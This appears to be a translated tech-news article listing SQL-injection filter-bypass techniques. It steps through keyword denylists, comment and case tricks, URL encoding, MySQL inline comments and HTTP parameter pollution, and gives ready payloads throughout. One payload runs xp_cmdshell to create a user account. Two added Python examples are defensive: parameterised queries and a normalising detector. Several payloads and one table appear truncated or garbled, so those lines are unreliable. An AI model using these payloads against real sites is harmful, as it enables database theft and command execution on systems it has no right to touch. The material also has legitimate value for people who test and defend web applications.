
What are the knowledge points bypassed by SQL injection

2025-04-01 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This article introduces the knowledge points involved in bypassing SQL injection filters. The techniques are laid out in some detail and have reference value; interested readers should read to the end.

I. The idea behind bypassing a WAF

Start from the first filtering step, analyse what it blocks piece by piece, and then find what it lets through.

1. Filter and, or

preg_match('/(and|or)/i', $id)

Filtered injection: 1 or 1=1 / 1 and 1=1
Bypassed injection: 1 || 1=1 / 1 && 1=1

2. Filter and, or, union

preg_match('/(and|or|union)/i', $id)

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3. Filter and, or, union, where

preg_match('/(and|or|union|where)/i', $id)

Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4. Filter and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)

Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5. Filter and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)

Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id), 1, 1) user from users) = 1

6. Filter and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id), 1, 1) user from users) = 1
Bypassed injection: 1 || 1=1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user, 1, 1) = 'a'

7. Filter and, or, union, where, limit, group by, select, '

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id), 1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user, 1, 1) = 0x61
Bypassed injection: 1 || substr(user, 1, 1) = unhex(61)

8. Filter and, or, union, where, limit, group by, select, ', hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

Filtered injection: 1 || substr(user, 1, 1) = unhex(61)
Bypassed injection: 1 || substr(user, 1, 1) = lower(conv

9. Filter and, or, union, where, limit, group by, select, ', hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

Filtered injection: 1 || substr(user, 1, 1) = lower(conv
Bypassed injection: 1 || lpad(user, 7, 1)

10. Filter and, or, union, where, limit, group by, select, ', hex, substr, whitespace

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

Filtered injection: 1 || lpad(user, 7, 1)
Bypassed injection: 1||lpad(user,7,1)
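The ten stages above show the structural problem with a denylist: every added keyword is answered by a payload that does not contain it, while legitimate values that happen to contain "or" or "and" get blocked. The added example below (not code from the original article) mirrors the final-stage regex in Python and puts it beside the fix a defender actually wants: allow-list the parameter's type and bind it, so the value never reaches the SQL parser as syntax. The `users` table and its rows are constructed sample data.

```python
import re
import sqlite3

# Python equivalent of the article's stage-10 filter:
# preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
DENYLIST = re.compile(r"(and|or|union|where|limit|group by|select|'|hex|substr|\s)",
                      re.IGNORECASE)


def denylist_allows(value: str) -> bool:
    """True when the article's regex would let the value through unchanged."""
    return DENYLIST.search(value) is None


def allowlist_id(value: str) -> int:
    """Allow-list validation: an id is a short decimal integer and nothing else."""
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError(f"rejected id: {value!r}")
    return int(value)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the article's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, raw_id: str) -> list[str]:
    """String concatenation: whatever survives the filter is executed as SQL."""
    rows = conn.execute(f"SELECT user FROM users WHERE user_id = {raw_id}")
    return sorted(r[0] for r in rows)


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> list[str]:
    """Validate the type first, then bind: the value is data, never syntax."""
    uid = allowlist_id(raw_id)
    rows = conn.execute("SELECT user FROM users WHERE user_id = ?", (uid,))
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("denylist passes '1||1=1':", denylist_allows("1||1=1"))      # True
    print("denylist passes 'password':", denylist_allows("password"))  # False ("or")
    print("unsafe '1 or 1=1' ->", lookup_unsafe(db, "1 or 1=1"))       # both users
    print("safe '1' ->", lookup_safe(db, "1"))                         # ['admin']
```

Note that the denylist blocks the harmless value `password` (it contains "or") yet passes the article's stage-10 bypass; the allow-list rejects every non-integer regardless of how it is spelled.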

II. Regex bypass

Bypass by exploiting the fuzzy-matching behaviour of the regular expression, for example when '=' is filtered.

Filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1, 1 or '1', 1 or char(97)

E.g.:

Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

III. General bypass

1. Comment characters

?id=1+un/**/ion+se/**/lect+1,2,3--

2. Mixed upper and lower case

?id=1+UnIoN/**/SeLecT/**/1,2,3--

3. Keyword substitution

Some WAFs remove SQL keywords with preg_replace instead of rejecting the request, so a keyword nested inside itself survives one pass of the replacement:

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+union+select+1,2,3--

Sometimes the comment sequence /**/ is itself filtered, in which case it can simply be dropped:

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed: http://localhost/id/1||lpad(first_name,7,1).html

4. Encoding

A classic example: NukeSentinel.php

// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if ($blocker_row['activate'] > 0) {
    // Matches only fixed spellings of "union" in the raw and base64-decoded query string
    if (stristr($nsnst_const['query_string'], '+union+') OR
        stristr($nsnst_const['query_string'], '%20union%20') OR
        stristr($nsnst_const['query_string'], '*/union/*') OR
        stristr($nsnst_const['query_string'], ' union ') OR
        stristr($nsnst_const['query_string_base64'], '+union+') OR
        stristr($nsnst_const['query_string_base64'], '%20union%20') OR
        stristr($nsnst_const['query_string_base64'], '*/union/*') OR
        stristr($nsnst_const['query_string_base64'], ' union ')) {
        // block_ip($blocker_row);
        die("BLOCK IP 1");
    }
}

Forbidden: http://localhost/php/?/**/union/**/select
Bypassed: http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed: http://localhost/php/?%2f**%2funion%2f**%2fselect

5. Buffer overflow

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--

6. Inline comments (MySQL)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
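Sections 1, 2, 4 and 6 all defeat the same weakness: the NukeSentinel rule compares the raw query string against a handful of literal spellings, so any encoding, case or comment variant of the same SQL is invisible to it. The added example below (my own detection code, not the article's or NukeSentinel's) canonicalises a query string before matching: percent-decode until stable, treat `/*...*/` as whitespace but keep the body of MySQL `/*!...*/` comments because the server executes it, then fold case. The sample query strings are the ones from the article, plus one constructed benign string.

```python
import re
from urllib.parse import unquote

# Constructed samples: the article's NukeSentinel URLs (section 4) and the
# inline-comment form from section 6, with paths only. Only the first is a
# literal hit for the original rule.
SAMPLES = [
    "/php/?/**/union/**/select",
    "/php/?/%2A%2A/union/%2A%2A/select",
    "/php/?%2f**%2funion%2f**%2fselect",
    "/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--",
]
BENIGN = "/php/?q=reunion+selection"  # constructed: must not trigger


def literal_match(query: str) -> bool:
    """What the NukeSentinel rule does: search for fixed spellings of 'union'."""
    q = query.lower()
    return any(tok in q for tok in ("+union+", "%20union%20", "*/union/*", " union "))


def normalize(query: str, max_rounds: int = 3) -> str:
    """Canonical form for matching: decode percent-encoding until it stops
    changing (bounded, so %25-chains cannot loop forever), '+' -> space,
    /*!body*/ -> body (MySQL executes it), /*...*/ -> space, collapse
    whitespace, lower-case."""
    decoded = query
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("+", " ")
    decoded = re.sub(r"/\*!(.*?)\*/", r" \1 ", decoded, flags=re.DOTALL)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.DOTALL)
    decoded = re.sub(r"\s+", " ", decoded)
    return decoded.lower()


UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b")


def normalized_match(query: str) -> bool:
    """Match the SQL shape on the canonical form instead of on raw bytes."""
    return UNION_SELECT.search(normalize(query)) is not None


if __name__ == "__main__":
    for s in SAMPLES + [BENIGN]:
        print(f"{s!r}: literal={literal_match(s)} normalized={normalized_match(s)}")
```

Normalisation is a detection aid for logs and WAF rules, not a substitute for parameterised queries: the canonical form still has to be matched against a pattern, and the pattern is still a denylist.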

IV. Advanced bypass

1. HPP (HTTP parameter pollution)

For example, given index.php?par1=val1&par1=val2, each server resolves par1 differently:

| Web server | par1 |
|:-|:-|
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

E.g., in an ASP/ASP.NET environment:

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed: http://localhost/search.aspx?q=select name&q=password from users
Bypassed: http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed: http://localhost/news.aspx?id=1';/*&id=1*/EXEC/*&id=1*/master..xp_cmdshell/*&id=1*/net user test test/*&id=1*/--

2. HPC (HTTP parameter contamination)

RFC 2396 defines the following character classes:

Unreserved: a-z, A-Z, 0-9 and - _ . ! ~ * ' ( )
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `

Different Web servers have different logic when processing specially constructed requests:

| Query String | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
|:-|:-|:-|
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test=1 | test= | test=1 |
| ?test=11 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

E.g.:

Forbidden: http://localhost/?xp_cmdshell
Bypassed: http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed: http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1 0/(select top 1 table_name from information_schema.tables)
Bypassed: http://localhost/news.asp?id=10 a%nd 1 0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

That is all of the article "What are the knowledge points bypassed by SQL injection?". Thank you for reading! We hope the content shared here helps you; for more related knowledge, follow the industry information channel.
